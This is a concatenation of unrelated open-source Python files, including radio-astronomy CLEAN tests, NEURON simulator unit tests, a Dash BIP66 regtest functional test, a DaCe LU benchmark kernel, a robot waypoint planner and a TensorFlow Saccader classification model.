dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 0.8
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
out_map = clean(dirty_map, dirty_beam, clean_beam_width=0.0)
# Within threshold default threshold of 0.1
assert np.allclose(clean_map, (out_map[0]+out_map[1]), out_map, atol=dirty_beam.max() * 0.1)
def test_component():
comp = np.zeros((3, 3))
comp[1, 1] = 1.0
res = component(scale=0, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=1, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=2, shape=(6, 6))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert np.all(res[2:4, 2:4] == res.max())
res = component(scale=3, shape=(7, 7))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert res[3, 3] == 1
def test_radial_prolate_spheroidal():
amps = [radial_prolate_sphereoidal(r) for r in [-1.0, 0.0, 0.5, 1.0, 2.0]]
assert amps[0] == 1.0
assert amps[1] == 1.0
assert amps[2] == 0.36106538453111797
assert amps[3] == 0.0
assert amps[4] == 0.0
def test_vec_radial_prolate_spheroidal():
radii = np.linspace(-0.5, 1.5, 1000)
amps1 = [radial_prolate_sphereoidal(r) for r in radii]
amps2 = vec_radial_prolate_sphereoidal(radii)
assert np.allclose(amps1, amps2)
def test_ms_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 1.0
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve2d(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
model, res = ms_clean(dirty_map, dirty_beam, scales=[1], clean_beam_width=0.0)
recovered = model + res
# Within threshold default threshold
assert np.allclose(clean_map, recovered, atol=dirty_beam.max() * 0.1)
def test_clean_sim():
n = m = 32
data = Gaussian2DKernel(stddev=3.0, x_size=n, y_size=m).array
# data = np.zeros((n, m))
# data[13,13] = 10.0
# data[12:14,12:14] = 10.0/4.0
half_log_space = np.logspace(np.log10(0.03030303), np.log10(0.48484848), 10)
theta = np.linspace(0, 2*np.pi, 32)
theta = theta[np.newaxis, :]
theta = np.repeat(theta, 10, axis=0)
r = half_log_space
r = r[:, np.newaxis]
r = np.repeat(r, 32, axis=1)
x = r * np.sin(theta)
y = r * np.cos(theta)
sub_uv = np.vstack([x.flatten(), y.flatten()])
sub_uv = np.hstack([sub_uv, np.zeros((2, 1))]) / u.arcsec
# Factor of 9 is compensate for the factor of 3 * 3 increase in size
dirty_beam = idft_map(np.ones(321)*9, (n*3, m*3), sub_uv)
vis = dft_map(data, sub_uv)
dirty_map = idft_map(vis, (n, m), sub_uv)
clean_map, res = clean(dirty_map, dirty_beam, clean_beam_width=0)
np.allclose(data, clean_map + res, atol=dirty_beam.max() * 0.1)
|
# -*-coding:Utf-8 -*
from mplotlab import App
from matplotlib.backend_bases import NavigationToolbar2
import wx
class Cursors:
# this class is only used as a simple namespace
HAND, POINTER, SELECT_REGION, MOVE = list(range(4))
cursors = Cursors()
cursord = {
cursors.MOVE : wx.CURSOR_HAND,
cursors.HAND : wx.CURSOR_HAND,
cursors.POINTER : wx.CURSOR_ARROW,
cursors.SELECT_REGION : wx.CURSOR_CROSS,
}
class Navigation(NavigationToolbar2):
def __init__(self,*a,**k):
NavigationToolbar2.__init__(self, *a,**k)
def _init_toolbar(self,*args,**kwargs):
pass
def set_message(self,s):
""" display in the status bar
the mouseover data (x,y)
"""
try:
App().mainWin.GetStatusBar().SetStatusText(s,0)
except:
pass
def set_cursor(self, cursor):
cursor =wx.StockCursor(cursord[cursor])
self.canvas.SetCursor( cursor )
def dynamic_update(self):
d = self._idle
self._idle = False
if d:
self.canvas.draw()
self._idle = True
def press(self, event):
if self._active == 'ZOOM':
self.wxoverlay = wx.Overlay()
def release(self, event):
if self._active == 'ZOOM':
# When the mouse is released we reset the overlay and it
# restores the former content to the window.
self.wxoverlay.Reset()
del self.wxoverlay
def draw_rubberband(self, event, x0, y0, x1, y1):
# Use an Overlay to draw a rubberband-like bounding box.
dc = wx.ClientDC(self.canvas)
odc = wx.DCOverlay(self.wxoverlay, dc)
odc.Clear()
# Mac's DC is already the same as a GCDC, and it causes
# problems with the overlay if we try to use an actual
# wx.GCDC so don't try it.
if 'wxMac' not in wx.PlatformInfo:
dc = wx.GCDC(dc)
height = self.canvas.figure.bbox.height
y1 = height - y1
y0 = height - y0
if y1<y0: y0, y1 = y1, y0
if x1<y0: x0, x1 = x1, x0
w = x1 - x0
h = y1 - y0
rect = wx.Rect(x0, y0, w, h)
rubberBandColor = '#C0C0FF' # or load from config?
# Set a pen for the border
color = wx.NamedColour(rubberBandColor)
dc.SetPen(wx.Pen(color, 1))
# use the same color, plus alpha for the brush
r, g, b = color.Get()
color.Set(r,g,b, 0x60)
dc.SetBrush(wx.Brush(color))
dc.DrawRectangleRect(rect)
|
"""
UnitTests of the python interface to the neuron class.
Items declared in neuron/__init__.py
$Id$
"""
import unittest
import neuron
from neuron import h
class NeuronTestCase(unittest.TestCase):
"""Tests of neuron"""
def testHClass(self):
"""Test subclass of hoc class."""
from ._subclass import A1
a = A1(5)
assert a.x == 5.0
assert a.p() == 6.0
b = A1(4)
a.s = "one"
b.s = "two"
assert a.s == "one"
assert b.s == "two"
assert h.A[0].s == "one"
assert a.p() == 7.0
assert b.p() == 5.0
a.a = 2
b.a = 3
assert a.a == 2
assert b.a == 3
assert h.List("A").count() == 2
a = 1
b = 1
assert h.List("A").count() == 0
@classmethod
def psection(cls):
"""Test neuron.psection(Section)"""
s = h.Section(name="soma")
neuron.psection(s)
def testpsection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.psection)
p.start()
p.join()
def testABI(self):
"""Test use of some Py_LIMITED_API for python3."""
# Py_nb_bool
assert True if h else False
assert True if h.List else False
# ensure creating a List doesn't change the truth value
l = h.List()
assert True if h.List else False
assert False if l else True
v = h.Vector(1)
l.append(v)
assert True if l else False
# Py_sq_length
assert len(l) == 1
# Py_sq_item
assert l[0] == v
# Py_sq_ass_item
v.x[0] = 5
assert v.x[0] == 5
def testIterators(self):
"""Test section, segment, mechanism, rangevar iterators."""
# setup model
sections = [h.Section(name="s%d" % i) for i in range(3)]
iclamps = [h.IClamp(sec(0.5)) for sec in sections]
for i, sec in enumerate(sections):
sec.nseg = 3
sec.insert("pas")
sec.insert("hh")
# iterate
import hashlib
sha = hashlib.sha256()
for sec in h.allsec():
for seg in sec:
for mech in seg:
for var in mech:
txt = "%s(%g).%s.%s=%g" % (
sec.name(),
seg.x,
mech.name(),
var.name(),
var[0],
)
sha.update(txt.encode("utf-8"))
d = sha.hexdigest()
d1 = "ac49344c054bc9e56e165fa75423d8bcb7cce96c4527f259362b527ee05103d8"
# in case NRN_ENABLE_MOD_COMPATIBILITY=ON
# (set by -DNRN_ENABLE_CORENEURON=ON)
d2 = "44366906aa94a50644bc734eb23afcc25d1206c0431c4e7908698eeb2597c385"
assert d == d1 or d == d2
sections[0](0.5).na_ion.ena = 40.0 # issue #651
assert sections[0](0.5).na_ion.ena == 40.0
def testSectionArgOrder(self):
"""First optional arg for Section is name (but name="name" is recommended)"""
soma = h.Section("soma")
assert soma.name() == "soma"
def testSectionCell(self):
"""Section.cell() internally referenced as weakref."""
err = -1
try:
soma = h.Section(cell="foo", name="soma")
err = 1
except:
err = 0
assert err == 0
class Cell:
def __str__(self):
return "hello"
c = Cell()
soma = h.Section(cell=c, name="soma")
assert soma.name() == "hello.soma"
assert soma.cell() == c
del c
assert soma.cell() is None
def testSectionListIterator(self):
"""As of v8.0, iteration over a SectionList does not change the cas"""
# See issue 509. SectionList iterator bug requires change to
# longstanding behavior
soma = h.Section(name="soma")
soma.push()
sections = [h.Section(name="s%d" % i) for i in range(3)]
assert len([s for s in h.allsec()]) == 4
sl = h.SectionList(sections)
# Iteration over s SectionList does not change the currently accessed section
for s in sl:
assert 1 and h.cas() == soma
# If an iteration does not complete the section stack is still ok.
assert sections[1] in sl
assert 2 and h.cas() == soma
@classmethod
def ExtendedSection(cls):
"""test prsection (modified print statement)"""
from neuron.sections import ExtendedSection
s = ExtendedSection(name="test")
s.psection()
def testExtendedSection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.ExtendedSection)
p.start()
p.join()
@classmethod
def RxDexistence(cls):
"""test import rxd and geometry3d"""
error = 0
try:
from neuron import rxd
from neuron.rxd import geometry
print("has_geometry3d is " + str(geometry.has_geometry3d))
except Exception as e:
print("'from neuron import rxd' failed", e)
error = 1
else:
try:
a = basicRxD3D()
print(" basicRxD3D() ran with no exception")
except Exception as e:
print("'basicRxD3D()' failed", e)
error = 1
assert error == 0
return 0
def testHelp(self):
error = False
try:
from neuron import doc
print(doc.get_docstring("xpanel", ""))
except Exception as e:
print("'doc.get_docstring('xpanel', '')' failed:", e)
error = True
self.assertFalse(error)
return 0
def testRxDexistence(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.RxDexistence)
p.start()
p.join()
assert p.exitcode == 0
return 0
def test_newobj_err(self):
"""Test deletion of incompletely constructed objects"""
print() # Error message not on above line
h.load_file("stdlib.hoc") # need hoc String
h(
"""
begintemplate Foo
endtemplate Foo
begintemplate NewObj
objref this, ob, foo1, foo2
proc init() {localobj s
foo1 = new Foo() // Constructed before error, even partial constructions fill this field.
if ($1 == 0) {
execerror("generate an error") // All NewObj instances undergoing construction
} else if ($1 == $2) {
// This and all NewObj instances prior to this will construct successfully.
// All after this will be partially constructed.
// The execerror should cause only the partially constructed NewObj to
// be destroyed.
s = new String()
sprint(s.s, "ob = new NewObj(%d, %d)", $1-1, $2)
execute1(s.s, this)
} else {
ob = new NewObj($1-1, $2)
}
foo2 = new Foo() // Only instances prior to execute1 reach here.
}
endtemplate NewObj
"""
)
# arg[0] recursion depth
# arg[0] - arg[1] + 1 should be successfully constructed
# arg[1] should be partially constructed and destroyed.
args = (4, 2)
a = h.NewObj(*args)
b = h.List("NewObj")
c = h.List("Foo")
print("#NewObj and #Foo in existence", b.count(), c.count())
z = args[0] - args[1] + 1
assert b.count() == z
assert c.count() == 2 * z
del a
del b
del c
b = h.List("NewObj")
c = h.List("Foo")
print("after del a #NewObj and #Foo in existence", b.count(), c.count())
assert b.count() == 0
assert c.count() == 0
return 1
def basicRxD3D():
from neuron import h, rxd
s = h.Section(name="s")
s.L = s.diam = 1
cyt = rxd.Region([s])
ca = rxd.Species(cyt)
rxd.set_solve_type(dimension=3)
h.finitialize(-65)
h.fadvance()
return 1
def suite():
suite = unittest.makeSuite(NeuronTestCase, "test")
return suite
if __name__ == "__main__":
# unittest.main()
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP66 (DER SIG).
Test that the DERSIG soft-fork activates at (regtest) height 1251.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import *
from test_framework.blocktools import create_coinbase, create_block
from test_framework.script import CScript
from io import BytesIO
DERSIG_HEIGHT = 1251
# Reject codes that we might receive in this test
REJECT_INVALID = 16
REJECT_OBSOLETE = 17
REJECT_NONSTANDARD = 64
# A canonical signature consists of:
# <30> <total len> <02> <len R> <R> <02> <len S> <S> <hashtype>
def unDERify(tx):
"""
Make the signature in vin 0 of a tx non-DER-compliant,
by adding padding after the S-value.
"""
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
newscript.append(i[0:-1] + b'\0' + i[-1:])
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
def create_transaction(node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(signresult['hex'])))
return tx
class BIP66Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-whitelist=127.0.0.1', '-dip3params=9000:9000']]
self.setup_clean_chain = True
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
# wait_for_verack ensures that the P2P connection is fully up.
self.nodes[0].p2p.wait_for_verack()
self.log.info("Mining %d blocks", DERSIG_HEIGHT - 2)
self.coinbase_blocks = self.nodes[0].generate(DERSIG_HEIGHT - 2)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that a transaction with non-DER signature can still appear in a block")
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[0],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
tip = self.nodes[0].getbestblockhash()
block_time = self.nodes[0].getblockheader(tip)['mediantime'] + 1
block = create_block(int(tip, 16), create_coinbase(DERSIG_HEIGHT - 1), block_time)
block.nVersion = 2
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
self.log.info("Test that blocks must now be at least version 3")
tip = block.sha256
block_time += 1
block = create_block(tip, create_coinbase(DERSIG_HEIGHT), block_time)
block.nVersion = 2
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
assert_equal(self.nodes[0].p2p.last_message["reject"].code, REJECT_OBSOLETE)
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'bad-version(0x00000002)')
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
del self.nodes[0].p2p.last_message["reject"]
self.log.info("Test that transactions with non-DER signatures cannot appear in a block")
block.nVersion = 3
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[1],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
# First we show that this tx is valid except for DERSIG by getting it
# rejected from the mempool for exactly that reason.
assert_raises_rpc_error(-26, '64: non-mandatory-script-verify-flag (Non-canonical DER signature)', self.nodes[0].sendrawtransaction, bytes_to_hex_str(spendtx.serialize()), True)
# Now we verify that a block with this transaction is also invalid.
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
# We can receive different reject messages depending on whether
# dashd is running with multiple script check threads. If script
# check threads are not in use, then transaction script validation
# happens sequentially, and dashd produces more specific reject
# reasons.
assert self.nodes[0].p2p.last_message["reject"].code in [REJECT_INVALID, REJECT_NONSTANDARD]
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
if self.nodes[0].p2p.last_message["reject"].code == REJECT_INVALID:
# Generic rejection when a block is invalid
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'block-validation-failed')
else:
assert b'Non-canonical DER signature' in self.nodes[0].p2p.last_message["reject"].reason
self.log.info("Test that a version 3 block with a DERSIG-compliant transaction is accepted")
block.vtx[1] = create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.sha256)
if __name__ == '__main__':
BIP66Test().main()
|
import collections
EstimatorSetting = collections.namedtuple(
'EstimatorSetting', ['title', 'estimator', 'parameter_space'])
|
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060339901(StandaardPost):
def __init__(self):
super().__init__(
nummer='0603.39901',
beschrijving='Heropvoegen van betonstraatstenen volgens 6-3.4',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BestratingVanBetonstraatsteen',
attribuutURI='',
dotnotatie='',
defaultWaarde='',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='wordt gemapt 2.0',
mappingOpmerking='Activiteit [Heropvoegen] komt niet voor in de OTL',
standaardpostnummer='0603.39901')])
|
import sys, inspect, re
from os.path import basename, split
__all__ = ['this_tests']
class RegisterTestsPerAPI:
apiTestsMap = dict()
@staticmethod
def this_tests(testedapi):
prev_frame = inspect.currentframe().f_back.f_back
pathfilename, line_number, test_function_name, lines, index = inspect.getframeinfo(prev_frame)
lineno_parentfunc, parent_func = get_parent_func(line_number, get_lines(pathfilename))
list_test = [{'file': basename(pathfilename), 'test': test_function_name , 'line': str(lineno_parentfunc)}]
fq_apiname = full_name_with_qualname(testedapi)
if fq_apiname in RegisterTestsPerAPI.apiTestsMap:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = RegisterTestsPerAPI.apiTestsMap[fq_apiname] + list_test
else:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = list_test
def this_tests(testedapi):
RegisterTestsPerAPI.this_tests(testedapi)
def full_name_with_qualname(testedapi):
return f'{testedapi.__module__}.{testedapi.__qualname__}'
def set_default(obj):
if isinstance(obj, set): return list(obj)
raise TypeError
def get_parent_func(lineno, lines):
for idx,l in enumerate(reversed(lines[:lineno])):
if re.match(f'^def test', l): return (lineno - (idx+1)), l
return None
def get_lines(file):
with open(file, 'r') as f: return f.readlines()
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import math
import numpy as np
import dace
import polybench
N = dace.symbol('N')
#datatypes = [dace.float64, dace.int32, dace.float32]
datatype = dace.float64
# Dataset sizes
sizes = [{N: 40}, {N: 120}, {N: 400}, {N: 2000}, {N: 4000}]
args = [([N, N], datatype)]
def init_array(A):
n = N.get()
for i in range(0, n, 1):
for j in range(0, i + 1, 1):
# Python does modulo, while C does remainder ...
A[i, j] = datatype(-(j % n)) / n + 1
for j in range(i + 1, n, 1):
A[i, j] = datatype(0)
A[i, i] = datatype(1)
A[:] = np.dot(A, np.transpose(A))
@dace.program(datatype[N, N])
def lu(A):
for i in range(0, N, 1):
for j in range(0, i, 1):
@dace.map
def k_loop1(k: _[0:j]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
@dace.tasklet
def div():
ij_in << A[i, j]
jj_in << A[j, j]
out >> A[i, j]
out = ij_in / jj_in
for j in range(i, N, 1):
@dace.map
def k_loop2(k: _[0:i]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
if __name__ == '__main__':
polybench.main(sizes, args, [(0, 'A')], init_array, lu)
|
import pandas as pd
import numpy as np
COLORS_QTY: int = 5
# =============================================================================
# Argument parsing.
# =============================================================================
import argparse
from scipy import integrate
argument_parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="Plot figures based on run data.")
argument_default_values = {
"suffix": 'kissat_ibm',
"folder": "."
}
argument_parser.add_argument('-f', '--folder',
type=str,
action='store',
default=argument_default_values['folder'],
help="Folder in which to look for the file (default: '.')"
)
argument_parser.add_argument('-s', '--suffix',
type=str,
action='store',
default=argument_default_values['suffix'],
help="File suffix used in produce_run_data (default: 'kissat_ibm')"
)
parsed_parameters = argument_parser.parse_args()
folder: str = parsed_parameters.folder
suffix: str = parsed_parameters.suffix
# =============================================================================
# Finished parsing
# =============================================================================
def __rename_strategies__(df: pd.DataFrame) -> pd.DataFrame:
df["strategy"] = df["strategy"].str.replace(
".*-discrimination-based", "discrimination-based", regex=True)
df["strategy"] = df["strategy"].str.replace(
"Info. over Decision/Time", "information-based", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Random", "random", regex=False)
# Rename discrimination component
df["strategy"] = df["strategy"].str.replace(" 10100%", "", regex=False)
df["strategy"] = df["strategy"].str.replace(".00%", "%", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Subset", "subset", regex=False)
df["selection"] = df["strategy"].str.extract(r'^([^+]*) \+ .*')
df["discrimination"] = df["strategy"].str.extract(r'^[^+]* \+ (.*)')
return df
def __filter_best_strategies__(df: pd.DataFrame) -> pd.DataFrame:
# Remove all that don't have timeout correction
df["baseline"] = df["selection"].str.contains(
"random") | df["discrimination"].str.contains("subset")
return df
dico = {}
for i, configurations in enumerate(range(10, 60, 10)):
for j, split in enumerate(range(10, 60, 10)):
ratio = split / 100
detailed_df = pd.read_csv(f"{folder}/detailed_runs_{suffix}_{configurations}_{ratio}.csv")
detailed_df = detailed_df.drop("Unnamed: 0", axis=1)
detailed_df = __rename_strategies__(detailed_df)
df = __filter_best_strategies__(detailed_df)
# Remove subset
df = df[~df["discrimination"].str.contains("subset")]
# Take mean performance
df = df.groupby(["selection", "time"]).mean().reset_index()
df["prediction"] *= 100
for method in df["selection"].unique():
if method not in dico:
dico[method] = np.zeros((5, 5))
data = df[df["selection"] == method]
data = data[["prediction", "time"]].to_numpy()
auc = integrate.trapezoid(data[:, 0], dx=1, axis=0)
dico[method][i, j] = auc / 10000 * 100
COLOR_NAMES = [f"color{i+1}" for i in range(COLORS_QTY)]
for method, values in dico.items():
print("\\begin{table}")
print("\t\\centering")
print("\t\\caption{Percentage of total AUC Evolution for " + method + " on " + suffix.replace("_", " ") + "}")
print("\t\\begin{tabular}{"+ ("c" * 6) + "}")
print("\t\t\\toprule")
print("\t\tConfigurations & 10 & 20 & 30 & 40 & 50 \\\\")
mini = np.min(values)
maxi = np.max(values)
scale = maxi - mini
unit = scale / (len(COLOR_NAMES) - 1)
for j, percent in enumerate(range(10, 60, 10)):
line_values = [float(values[i, j])
for i, _ in enumerate(range(10, 60, 10))]
colors = [COLOR_NAMES[round((x - mini) / unit)] for x in line_values]
print(f"\t\t{percent}\\% & " + " & ".join(f"\\colorbox{{{color}!30}}{{{val:.1f}}}" for color, val in zip(colors, line_values)) + "\\\\")
print("\t\t\\bottomrule")
print("\t\\end{tabular}")
print("\\end{table}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import math
import numpy as np
FIELD_SCORE_NUM_OFFSET=6
class Waypoints:
def __init__(self, path, side):
self.points = []
self.number = 0
self.Waypoints_Lap = 0
self.next_target_idx = -1
self.all_field_score = np.ones([18]) # field score state
self._load_waypoints(path, side)
print ('[waypoint]number of waypoints: '+str(len(self.points)))
def _load_waypoints(self, path, side):
with open(path) as f:
lines = csv.reader(f)
for l in lines:
# x,y,radian,target_idx(refer main code)
point = [float(n) for n in l]
point[2] = point[2]*math.pi/180.0
if side == 'r':
point[3] = int(point[3])
else:
point[3] = int(point[4])
print(" "+str(point))
self.points.append(point[0:4])
def get_next_waypoint(self):
self.number = self.number+1
if self.number == len(self.points):
self.Waypoints_Lap = self.Waypoints_Lap+1
print("[waypoint]next lap!!!!!!")
self.number = 0
#print("[waypoint]search target !!!!!!", self.all_field_score)
for i in range(self.number, len(self.points))+range(self.number):
score_num = self.points[i][3]
#print("[waypoint]"+str(score_num))
# 得点と関係ないwaypoint
if score_num == -1:
# 1週目は得点と関係ないwaypointも辿る。
if self.Waypoints_Lap == 0:
return self.points[self.number][0:3]
continue
# 得点と関係あるwaypoint
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
# if already get score, skip search
continue
else:
# if not get score, go to target
print("[waypoint]"+str(i)+"/"+str(len(self.points)))
self.number = i
return self.points[i][0:3]
print("[waypoint]got all field score !!!")
return self.points[self.number][0:3]
def get_current_waypoint(self):
return self.points[self.number]
def get_current_target_number(self):
# target No.
return self.points[self.number][3]
def get_any_waypoint(self, n):
return self.points[n]
def set_number(self, n):
self.number = n
def set_field_score(self, n):
self.all_field_score = n
# print(self.all_field_score)
def check_if_get_field_score(self, n):
score_num = n
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
return True
else:
return False
# if __name__ == "__main__":
# Waypoints('waypoints.csv')
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Saccader-Classification network model.
Saccader model is an image classification model with a hard attention mechanism.
The model uses the saccader model for visual attention
and uses a separate network for classification.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from saccader import utils
from saccader.visual_attention import saccader
from tensorflow.contrib import slim as contrib_slim
from tensorflow_models.slim.nets import nets_factory
from tensorflow_models.slim.nets.nasnet import nasnet
slim = contrib_slim
Saccader = saccader.Saccader
class SaccaderClassNet(Saccader):
"""Saccader-Classification Model.
Network that performs classification on images by taking glimpses at
different locations on an image.
Attributes:
num_classes: (Integer) Number of classification classes.
variable_scope: (String) Name of model variable scope.
attention_groups: (Integer) Number of groups in attention network.
attention_layers_per_group: (Integer) Number of layers in each group in
attention network.
saccader_cell: Saccader Cell object.
representation_network: Representation network object.
glimpse_shape: 2-D tuple of integers indicating glimpse shape.
glimpse_shape_classnet: 2-D tuple of integers indicating classification
network glimpse shape.
glimpse_shape_saccader: 2-D tuple of integers indicating saccader
glimpse shape.
var_list_representation_network: List of variables for the representation
network.
var_list_attention_network: List of variables for the attention network.
var_list_saccader_cell: List of variables for the saccader cell.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list_classnet: List of variables for the classification network.
var_list: List of all model variables.
init_op: Initialization operations for model variables.
"""
def __init__(self, config, variable_scope="saccader_classnet"):
Saccader.__init__(self, config, variable_scope=variable_scope+"/saccader")
self.var_list_saccader = []
self.var_list_classnet = []
self.classnet_type = config.classnet_type
self.num_classes = config.num_classes
self.variable_scope_classnet = variable_scope+"/"+self.classnet_type
self.glimpse_shape_saccader = (-1, -1)
self.glimpse_shape_classnet = config.glimpse_shape
def __call__(self,
images_saccader,
images_classnet,
num_times,
is_training_saccader=False,
is_training_classnet=False,
policy="learned",
stop_gradient_after_representation=False):
logits, locations_t, best_locations_t, endpoints = Saccader.__call__(
self,
images_saccader,
num_times,
is_training=is_training_saccader,
policy=policy,
stop_gradient_after_representation=stop_gradient_after_representation)
self.glimpse_shape_saccader = self.glimpse_shape
image_size_saccader = images_saccader.shape.as_list()[1]
image_size_classnet = images_classnet.shape.as_list()[1]
if self.glimpse_shape_classnet[0] < 0:
self.glimpse_shape_classnet = tuple([int(
image_size_classnet / image_size_saccader *
self.glimpse_shape[0])] * 2)
self.glimpse_shape = self.glimpse_shape_classnet
images_glimpse_t = []
for locations in locations_t:
images_glimpse = utils.extract_glimpse(
images_classnet, size=self.glimpse_shape_classnet, offsets=locations)
images_glimpse_t.append(images_glimpse)
batch_size = images_classnet.shape.as_list()[0]
images_glimpse_t = tf.concat(images_glimpse_t, axis=0)
variables_before = set(tf.global_variables())
reuse = True if self.var_list_classnet else False
with tf.variable_scope(self.variable_scope_classnet, reuse=reuse):
if self.classnet_type == "nasnet":
classnet_config = nasnet.large_imagenet_config()
classnet_config.use_aux_head = 0
classnet_config.drop_path_keep_prob = 1.0
with slim.arg_scope(nasnet.nasnet_large_arg_scope()):
classnet_logits, endpoints_ = nasnet.build_nasnet_large(
images_glimpse_t, self.num_classes,
is_training=is_training_classnet,
config=classnet_config)
elif self.classnet_type == "resnet_v2_50":
network = nets_factory.get_network_fn(
"resnet_v2_50", self.num_classes, is_training=is_training_classnet)
classnet_logits, endpoints_ = network(images_glimpse_t)
endpoints["classnet"] = endpoints_
variables_after = set(tf.global_variables())
logits_t = tf.reshape(classnet_logits, (num_times, batch_size, -1))
logits = tf.reduce_mean(logits_t, axis=0)
if not reuse:
self.var_list_saccader = self.var_list_classification + self.var_list_location
self.var_list_classnet = [
v for v in list(variables_after-variables_before)
if "global_step" not in v.op.name]
self.var_list.extend(self.var_list_classnet)
self.init_op = tf.variables_initializer(var_list=self.var_list)
return logits, locations_t, best_locations_t, endpoints
|
class Page(object):
start: int
end: int
domain: str
all_urls: Any
m3u8_dict: dict
__slots__ = ("start", "end", "domain", "all_urls", "m3u8_dict")
def __init__(self, start, end, domain, all_urls = [], **m3u8_dict):
# super().__init__()
self.start = start
self.end = end
self.domain = domain
self.all_urls = all_urls
self.m3u8_dict = m3u8_dict
|
import config
import models
import tensorflow as tf
import numpy as np
import os
from sys import argv
os.environ['CUDA_VISIBLE_DEVICES']='0'
#Input training files from benchmarks/FB15K/ folder.
con = config.Config()
#True: Input test files from the same folder.
